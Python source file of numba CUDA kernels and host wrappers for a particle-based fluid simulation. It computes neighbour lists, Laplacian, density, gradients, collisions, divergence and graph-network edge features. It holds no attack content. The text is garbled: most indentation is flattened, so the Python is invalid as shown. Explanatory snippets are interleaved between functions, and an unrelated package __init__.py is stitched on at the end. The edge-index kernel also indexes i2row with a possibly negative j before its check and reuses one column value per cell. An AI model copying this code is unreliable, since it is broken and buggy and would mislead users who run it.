@cuda.jit
def cu_get_laplacian(lap_val, lap_idx, i2row, pos, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
    if i < tot_num:
row = i2row[i]
if check_in_range(pos, boundary, i) and row != -1:
            # identify the cell the particle lies in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
center_sum = 0.
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
dist = distance(pos, i, j)
if dist < control_radius and j != i:
w = weight(dist, control_radius)
center_sum += w
col = i2row[j]
if col != -1:
lap_idx[row, 0] += 1
cursor = lap_idx[row, 0]
lap_val[row, cursor] = -w
lap_idx[row, cursor] = col
j = cell_next[j]
if j == -1:
break
lap_idx[row, 0] += 1
cursor = lap_idx[row, 0]
lap_val[row, cursor] = center_sum
lap_idx[row, cursor] = row
@cuda.jit
def cu_get_density(density, ptype, pos, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
    if i < tot_num:
if check_in_range(pos, boundary, i) and ptype[i] != 3:
            # identify the cell the particle lies in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
center_sum = 0.
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
rx = pos[i, 0] - pos[j, 0]
ry = pos[i, 1] - pos[j, 1]
rz = pos[i, 2] - pos[j, 2]
dist = math.sqrt(rx ** 2 + ry ** 2 + rz ** 2)
if dist < control_radius and j != i:
w = weight(dist, control_radius)
center_sum += w
j = cell_next[j]
if j == -1:
break
density[i] = center_sum
@cuda.jit
def cu_get_gradient(gradient, grad_val, i2row, pos, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
row = i2row[i]
if check_in_range(pos, boundary, i) and row != -1:
            # identify the cell the particle lies in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
val_min = grad_val[i]
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
dist = distance(pos, i, j)
if dist < control_radius:
neigh_val = grad_val[j]
if val_min > neigh_val:
val_min = neigh_val
j = cell_next[j]
if j == -1:
break
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
r_vec_x = pos[j, 0] - rx
r_vec_y = pos[j, 1] - ry
r_vec_z = pos[j, 2] - rz
r_2 = r_vec_x ** 2 + r_vec_y ** 2 + r_vec_z ** 2
dist = math.sqrt(r_2)
if dist < control_radius and j != i:
w = weight(dist, control_radius)
val_diff = grad_val[j] - val_min
w *= val_diff / r_2
gradient[3*row] += w * r_vec_x
gradient[3*row + 1] += w * r_vec_y
gradient[3*row + 2] += w * r_vec_z
j = cell_next[j]
if j == -1:
break
@cuda.jit
def cu_get_collision(vel, pos, ptype, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
if check_in_range(pos, boundary, i) and ptype[i] == 1:
            # identify the cell the particle lies in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
vx, vy, vz = vel[i, 0], vel[i, 1], vel[i, 2]
vx_temp, vy_temp, vz_temp = vx, vy, vz
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
if j != i and ptype[j] != 3:
r_vec_x = pos[j, 0] - rx
r_vec_y = pos[j, 1] - ry
r_vec_z = pos[j, 2] - rz
r_2 = r_vec_x ** 2 + r_vec_y ** 2 + r_vec_z ** 2
dist = math.sqrt(r_2)
if dist < control_radius:
fdt = (vx - vel[j, 0]) * r_vec_x +\
(vy - vel[j, 1]) * r_vec_y +\
(vz - vel[j, 2]) * r_vec_z
if fdt > 0.0:
fdt *= (1.0 + COL_COEF) * 0.5 / r_2
vx_temp -= r_vec_x * fdt
vy_temp -= r_vec_y * fdt
vz_temp -= r_vec_z * fdt
j = cell_next[j]
if j == -1:
break
vel[i, 0] = vx_temp
vel[i, 1] = vy_temp
vel[i, 2] = vz_temp
pos[i, 0] += (vx_temp - vx) * DT
pos[i, 1] += (vy_temp - vy) * DT
pos[i, 2] += (vz_temp - vz) * DT
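The per-pair update inside `cu_get_collision` removes the approaching component of the relative velocity along the separation vector, scaled by `(1 + COL_COEF) * 0.5`. A host-side sketch of that single-pair impulse; the `COL_COEF` value below is assumed for illustration only (the kernel uses `Constants.COL_COEF`):

```python
COL_COEF = 0.2  # assumed value for illustration; real value is Constants.COL_COEF

def collision_response(vi, vj, ri, rj):
    # r points from particle i to particle j, as in the kernel.
    r = [rj[k] - ri[k] for k in range(3)]
    r_2 = sum(c * c for c in r)
    # fdt > 0 means i is approaching j along the separation vector.
    fdt = sum((vi[k] - vj[k]) * r[k] for k in range(3))
    if fdt > 0.0:
        fdt *= (1.0 + COL_COEF) * 0.5 / r_2
        vi = [vi[k] - r[k] * fdt for k in range(3)]
    return vi

# Particle i moving toward a stationary neighbour loses part of its
# normal velocity component.
v_new = collision_response([1.0, 0.0, 0.0], [0.0, 0.0, 0.0],
                           [0.0, 0.0, 0.0], [0.05, 0.0, 0.0])
```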
@cuda.jit
def cu_get_gcn_average(gcn_val, gcn_idx, i2row, pos, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
row = i2row[i]
if check_in_range(pos, boundary, i) and row != -1:
            # identify the cell the particle lies in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
center_sum = 0.
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
dist = distance(pos, i, j)
if dist < control_radius and j != i:
w = weight(dist, control_radius)
col = i2row[j]
if col != -1:
center_sum += w
gcn_idx[row, 0] += 1
cursor = gcn_idx[row, 0]
gcn_val[row, cursor] = w
gcn_idx[row, cursor] = col
j = cell_next[j]
if j == -1:
break
gcn_idx[row, 0] += 1
cursor = gcn_idx[row, 0]
gcn_val[row, cursor] = 1
gcn_idx[row, cursor] = row
col_num = cursor
for n in range(1, col_num):
gcn_val[row, n] /= center_sum
@cuda.jit
def cu_get_col_feature(edge_attr, edge_idx, vel, pos, i2row, ptype,
cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
row = i2row[i]
if check_in_range(pos, boundary, i) and row != -1 and ptype[i] == 1:
            # identify the cell the particle lies in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
r_vec_x = rx - pos[j, 0]
r_vec_y = ry - pos[j, 1]
r_vec_z = rz - pos[j, 2]
r_2 = r_vec_x ** 2 + r_vec_y ** 2 + r_vec_z ** 2
dist = math.sqrt(r_2)
col = i2row[j]
if dist < control_radius and j != i and col != -1:
v_vec_x = vel[i, 0] - vel[j, 0]
v_vec_y = vel[i, 1] - vel[j, 1]
v_vec_z = vel[i, 2] - vel[j, 2]
edge_idx[row, 0] += 1
cursor = edge_idx[row, 0]
edge_attr[row, 6*cursor] = v_vec_x
edge_attr[row, 6*cursor + 1] = r_vec_x/dist
edge_attr[row, 6*cursor + 2] = v_vec_y
edge_attr[row, 6*cursor + 3] = r_vec_y/dist
edge_attr[row, 6*cursor + 4] = v_vec_z
edge_attr[row, 6*cursor + 5] = r_vec_z/dist
edge_idx[row, cursor] = col
j = cell_next[j]
if j == -1:
break
@cuda.jit
def cu_get_gns_feature(edge_attr, edge_idx, pos, i2row, ptype,
cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
row = i2row[i]
if check_in_range(pos, boundary, i) and row != -1 and ptype[i] == 1:
            # identify the cell the particle lies in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
r_vec_x = rx - pos[j, 0]
r_vec_y = ry - pos[j, 1]
r_vec_z = rz - pos[j, 2]
r_2 = r_vec_x ** 2 + r_vec_y ** 2 + r_vec_z ** 2
dist = math.sqrt(r_2)
col = i2row[j]
if dist < control_radius and j != i and col != -1:
edge_idx[row, 0] += 1
cursor = edge_idx[row, 0]
edge_attr[row, 4*cursor] = r_vec_x
edge_attr[row, 4*cursor + 1] = r_vec_y
edge_attr[row, 4*cursor + 2] = r_vec_z
edge_attr[row, 4*cursor + 3] = dist
edge_idx[row, cursor] = col
j = cell_next[j]
if j == -1:
break
@cuda.jit
def cu_get_divergence(divergence, div_val, ptype,
pos, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
if check_in_range(pos, boundary, i) and ptype[i] == 1:
            # identify the cell the particle is located in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
r_vec_x = pos[j, 0] - rx
r_vec_y = pos[j, 1] - ry
r_vec_z = pos[j, 2] - rz
r_2 = r_vec_x ** 2 + r_vec_y ** 2 + r_vec_z ** 2
dist = math.sqrt(r_2)
if dist < control_radius and j != i and ptype[j] != 3:
w = weight(dist, control_radius)
partial_x = r_vec_x * (div_val[j, 0] - div_val[i, 0])
partial_y = r_vec_y * (div_val[j, 1] - div_val[i, 1])
                                partial_z = r_vec_z * (div_val[j, 2] - div_val[i, 2])
div = w*(partial_x + partial_y + partial_z) / r_2
divergence[i] += div
j = cell_next[j]
if j == -1:
break
@cuda.jit
def cu_get_edge_idx(edge_idx, ptype, i2row,
pos, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
row = i2row[i]
if check_in_range(pos, boundary, i) and ptype[i] == 1 and row != -1:
            # identify the cell the particle is located in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
col = i2row[j]
if j == -1:
continue
while True:
r_vec_x = pos[j, 0] - rx
r_vec_y = pos[j, 1] - ry
r_vec_z = pos[j, 2] - rz
r_2 = r_vec_x ** 2 + r_vec_y ** 2 + r_vec_z ** 2
dist = math.sqrt(r_2)
if dist < control_radius and j != i and col != -1:
edge_idx[row, 0] += 1
cursor = edge_idx[row, 0]
edge_idx[row, cursor] = col
j = cell_next[j]
if j == -1:
break
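The kernels above all walk the same `cell_fst`/`cell_next` linked-list layout produced by `cell_sort`. A minimal CPU sketch (the helper names `build_cell_lists` and `particles_in_cell` are illustrative, not part of this module) of that layout and its traversal:

```python
import numpy as np

def build_cell_lists(cell_ids, n_cells):
    # cell_fst[c] holds the first particle stored in cell c;
    # cell_next[p] chains to the next particle in the same cell (-1 ends the list).
    cell_fst = -np.ones(n_cells, dtype=np.int32)
    cell_next = -np.ones(len(cell_ids), dtype=np.int32)
    for p, c in enumerate(cell_ids):
        cell_next[p] = cell_fst[c]   # prepend particle p to cell c's list
        cell_fst[c] = p
    return cell_fst, cell_next

def particles_in_cell(cell_fst, cell_next, c):
    # Same traversal pattern as the "while True: ... j = cell_next[j]" loops above.
    out = []
    j = cell_fst[c]
    while j != -1:
        out.append(j)
        j = cell_next[j]
    return out

cell_fst, cell_next = build_cell_lists([0, 1, 0, 1, 0], n_cells=2)
print(sorted(particles_in_cell(cell_fst, cell_next, 0)))  # -> [0, 2, 4]
```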
@nb.njit
def gen_i2row_map(ids, tot_num):
i2row = - np.ones((tot_num,), dtype=np.int32)
row = 0
for i in range(ids.shape[0]):
idx = ids[i]
i2row[idx] = row
row += 1
return i2row
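A quick plain-NumPy illustration (no numba, standalone values) of the id-to-dense-row mapping `gen_i2row_map` builds: the selected particle ids get consecutive row numbers, everything else stays -1.

```python
import numpy as np

ids = np.array([4, 1, 7], dtype=np.int32)   # example particle ids
i2row = -np.ones(10, dtype=np.int32)
i2row[ids] = np.arange(len(ids), dtype=np.int32)  # row numbers in id order
print(i2row.tolist())  # -> [-1, 1, -1, -1, 0, -1, -1, 2, -1, -1]
```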
@nb.njit
def find_min_max(val, h):
min_ = 1e10
max_ = -1e10
for i in range(val.shape[0]):
if min_ > val[i]:
min_ = val[i]
if max_ < val[i]:
max_ = val[i]
return (min_ - 2*h), (max_ + 2*h)
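A tiny standalone check (example values only) of the 2*h padding `find_min_max` applies to the fluid extent before the cell grid is laid out:

```python
vals = [0.5, -1.0, 2.0]
h = 0.25
# pad both ends of the extent by two cell lengths, as find_min_max does
lo, hi = min(vals) - 2 * h, max(vals) + 2 * h
print(lo, hi)  # -> -1.5 2.5
```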
def calc_cell_params(pos, ptype, control_radius):
cell_len = control_radius * 1.05
fluid_pos = pos[ptype == 1]
x_min, x_max = find_min_max(fluid_pos[:, 0], cell_len)
y_min, y_max = find_min_max(fluid_pos[:, 1], cell_len)
z_min, z_max = find_min_max(fluid_pos[:, 2], cell_len)
# boundary position
bound = np.array(
[x_max, x_min, y_max, y_min, z_max, z_min], dtype=np.float32)
    # calculate the number of cells along the different axes
    nx = int((x_max - x_min)/cell_len) + 3
    ny = int((y_max - y_min)/cell_len) + 3
    nz = int((z_max - z_min)/cell_len) + 3
nxy, nxyz = nx * ny, nx * ny * nz
return nx, nxy, nxyz, bound
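A sketch of the grid-sizing arithmetic used in `calc_cell_params` (values are illustrative): one ghost-cell layer on each side plus the `+ 1` index offset used in the kernels gives the `+ 3` in `nx`/`ny`/`nz`.

```python
control_radius = 2.0
cell_len = control_radius * 1.05            # 2.1
x_min, x_max = -1.0, 9.0                    # padded fluid extent along x
nx = int((x_max - x_min) / cell_len) + 3    # int(10.0 / 2.1) = 4, so nx = 7
print(nx)  # -> 7
```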
def get_laplacian_cuda(pos, ptype, ids, control_radius):
# python host wrapper for cuda kernel function "cu_get_laplacian"
d_pos = cuda.to_device(pos)
tot_num = pos.shape[0]
i2row = gen_i2row_map(ids, tot_num)
d_i2row = cuda.to_device(i2row)
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
lap_val = np.zeros((len(ids), 384), dtype=np.float32)
lap_idx = np.zeros((len(ids), 384), dtype=np.int32)
d_lap_val = cuda.to_device(lap_val)
d_lap_idx = cuda.to_device(lap_idx)
cu_get_laplacian[blocks_pg, threads_pb](d_lap_val, d_lap_idx, d_i2row,
d_pos, d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
cp_lap_idx = cp.asarray(d_lap_idx)
tot_size = cp.sum(cp_lap_idx[:, 0], axis=0).item()
count = cp.cumsum(cp_lap_idx[:, 0], axis=0)
lap_val = d_lap_val.copy_to_host()
lap_idx = d_lap_idx.copy_to_host()
count = cp.asnumpy(count)
return lap_val, lap_idx, tot_size, count
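The padded per-row buffers returned here keep the neighbour count in column 0, and the cumsum above suggests how they are later flattened into compact storage. A hedged sketch (hypothetical example data, not the actual `stack_*` helpers used elsewhere in this codebase):

```python
import numpy as np

lap_idx = np.array([[2, 5, 9, 0],      # row 0 has 2 neighbours: columns 5 and 9
                    [1, 3, 0, 0]])     # row 1 has 1 neighbour: column 3
counts = lap_idx[:, 0]
# slots 1..count hold the payload (the kernels start writing at cursor 1)
flat = np.concatenate([lap_idx[r, 1:1 + counts[r]] for r in range(len(counts))])
offsets = np.concatenate([[0], np.cumsum(counts)])  # CSR-style row offsets
print(flat.tolist(), offsets.tolist())  # -> [5, 9, 3] [0, 2, 3]
```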
def get_density_cuda(pos, ptype, control_radius):
# python host wrapper for cuda kernel function "cu_get_density"
d_pos = cuda.to_device(pos)
d_ptype = cuda.to_device(ptype)
tot_num = pos.shape[0]
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
density = np.zeros((tot_num, ), dtype=np.float32)
d_density = cuda.to_device(density)
cu_get_density[blocks_pg, threads_pb](d_density, d_ptype, d_pos,
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
density = d_density.copy_to_host()
return density
def get_gradient_cuda(grad_val, pos, ptype, ids, control_radius):
# python host wrapper for cuda kernel function "cu_get_gradient"
d_pos = cuda.to_device(pos)
tot_num = pos.shape[0]
i2row = gen_i2row_map(ids, tot_num)
d_i2row = cuda.to_device(i2row)
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
d_grad_val = cuda.to_device(grad_val)
gradient = np.zeros((len(ids) * 3), dtype=np.float32)
d_gradient = cuda.to_device(gradient)
cu_get_gradient[blocks_pg, threads_pb](d_gradient, d_grad_val, d_i2row, d_pos,
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
gradient = d_gradient.copy_to_host().reshape(-1, 3)
return gradient
def get_collision_cuda(vel, pos, ptype, control_radius):
d_pos = cuda.to_device(pos)
d_vel = cuda.to_device(vel)
d_ptype = cuda.to_device(ptype)
tot_num = pos.shape[0]
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
cu_get_collision[blocks_pg, threads_pb](d_vel, d_pos, d_ptype,
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
vel = d_vel.copy_to_host()
pos = d_pos.copy_to_host()
return vel, pos
def get_gcn_average_cuda(pos, ptype, ids, control_radius):
# python host wrapper for cuda kernel function "cu_get_gcn_average"
d_pos = cuda.to_device(pos)
tot_num = pos.shape[0]
i2row = gen_i2row_map(ids, tot_num)
d_i2row = cuda.to_device(i2row)
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
gcn_val = np.zeros((len(ids), 384), dtype=np.float32)
gcn_idx = np.zeros((len(ids), 384), dtype=np.int32)
d_gcn_val = cuda.to_device(gcn_val)
d_gcn_idx = cuda.to_device(gcn_idx)
cu_get_gcn_average[blocks_pg, threads_pb](d_gcn_val, d_gcn_idx, d_i2row,
d_pos, d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
if len(ids) > 1:
cp_gcn_idx = cp.asarray(d_gcn_idx[:, 0])
tot_size = cp.sum(cp_gcn_idx).item()
else:
tot_size = d_gcn_idx.copy_to_host()[0, 0]
gcn_val = d_gcn_val.copy_to_host()
gcn_idx = d_gcn_idx.copy_to_host()
return gcn_val, gcn_idx, tot_size
def get_collision_feature_cuda(vel, pos, ptype, control_radius):
d_pos = cuda.to_device(pos)
d_vel = cuda.to_device(vel)
d_ptype = cuda.to_device(ptype)
tot_num = pos.shape[0]
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
fluid_ids = np.argwhere(ptype == 1).reshape(-1,)
min_x, min_y, min_z = cell_bound[1], cell_bound[3], cell_bound[5]
p_in_cell = get_p_in_cell(pos, fluid_ids, cell_fst, cell_next, min_x, min_y, min_z, nxy, nx, control_radius)
p_in_cell = np.argwhere(p_in_cell == 1).astype(np.int32).reshape(-1,)
i2row = gen_i2row_map(p_in_cell, tot_num)
d_i2row = cuda.to_device(i2row)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
edge_attr = np.zeros((len(p_in_cell), 6*64), dtype=np.float32)
edge_idx = np.zeros((len(p_in_cell), 64), dtype=np.int32)
d_edge_attr = cuda.to_device(edge_attr)
d_edge_idx = cuda.to_device(edge_idx)
cu_get_col_feature[blocks_pg, threads_pb](d_edge_attr, d_edge_idx, d_vel, d_pos, d_i2row, d_ptype,
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
cp_edge_idx = cp.asarray(d_edge_idx[:, 0])
tot_size = cp.sum(cp_edge_idx).item()
edge_attr_arr = d_edge_attr.copy_to_host()
edge_idx_arr = d_edge_idx.copy_to_host()
edge_idx, edge_attr = stack_col_feature(edge_attr_arr, edge_idx_arr, tot_size)
return edge_attr, edge_idx, p_in_cell
def get_gns_feature_cuda(pos, ptype, control_radius):
d_pos = cuda.to_device(pos)
d_ptype = cuda.to_device(ptype)
tot_num = pos.shape[0]
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
fluid_ids = np.argwhere(ptype == 1).reshape(-1,)
min_x, min_y, min_z = cell_bound[1], cell_bound[3], cell_bound[5]
p_in_cell = get_p_in_cell(pos, fluid_ids, cell_fst, cell_next, min_x, min_y, min_z, nxy, nx, control_radius)
p_in_cell = np.argwhere(p_in_cell == 1).astype(np.int32).reshape(-1,)
i2row = gen_i2row_map(p_in_cell, tot_num)
d_i2row = cuda.to_device(i2row)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
edge_attr = np.zeros((len(p_in_cell), 4*128), dtype=np.float32)
edge_idx = np.zeros((len(p_in_cell), 128), dtype=np.int32)
d_edge_attr = cuda.to_device(edge_attr)
d_edge_idx = cuda.to_device(edge_idx)
cu_get_gns_feature[blocks_pg, threads_pb](d_edge_attr, d_edge_idx, d_pos, d_i2row, d_ptype,
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
cp_edge_idx = cp.asarray(d_edge_idx[:, 0])
tot_size = cp.sum(cp_edge_idx).item()
edge_attr_arr = d_edge_attr.copy_to_host()
edge_idx_arr = d_edge_idx.copy_to_host()
edge_idx, edge_attr = stack_gns_feature(edge_attr_arr, edge_idx_arr, tot_size)
return edge_attr, edge_idx, p_in_cell
def get_vel_div_cuda(vel, pos, ptype, control_radius):
d_vel = cuda.to_device(vel)
d_pos = cuda.to_device(pos)
d_ptype = cuda.to_device(ptype)
tot_num = pos.shape[0]
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
divergence = np.zeros((tot_num, ), dtype=np.float32)
d_divergence = cuda.to_device(divergence)
cu_get_divergence[blocks_pg, threads_pb](d_divergence, d_vel, d_ptype, d_pos,
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
divergence = d_divergence.copy_to_host()
return divergence
def get_edge_idx_cuda(ids, pos, ptype, control_radius):
d_pos = cuda.to_device(pos)
d_ptype = cuda.to_device(ptype)
tot_num = pos.shape[0]
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
i2row = gen_i2row_map(ids, tot_num)
d_i2row = cuda.to_device(i2row)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
if 1.9*BASE_RADIUS >= control_radius >= 1.0*BASE_RADIUS:
row_len = 64
elif 0.0 < control_radius < 1.0*BASE_RADIUS:
row_len = 32
elif 3.1*BASE_RADIUS > control_radius > 1.9*BASE_RADIUS:
row_len = 384
else:
raise Exception('Unsupported control radius')
edge_idx = np.zeros((len(ids), row_len), dtype=np.int32)
d_edge_idx = cuda.to_device(edge_idx)
    cu_get_edge_idx[blocks_pg, threads_pb](d_edge_idx, d_ptype, d_i2row, d_pos,  # order matches the kernel signature (ptype before i2row)
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
cp_edge_idx = cp.asarray(d_edge_idx[:, 0])
tot_size = cp.sum(cp_edge_idx).item()
edge_idx_arr = d_edge_idx.copy_to_host()
edge_idx = stack_edge_idx(edge_idx_arr, tot_size)
    return edge_idx
# ---- File: lppydsmc/data_structures/__init__.py (repo: Quettle/lppydsmc, MIT license) ----
from . import grid
from .grid import Grid
from .container import Container
from .particle import Particle
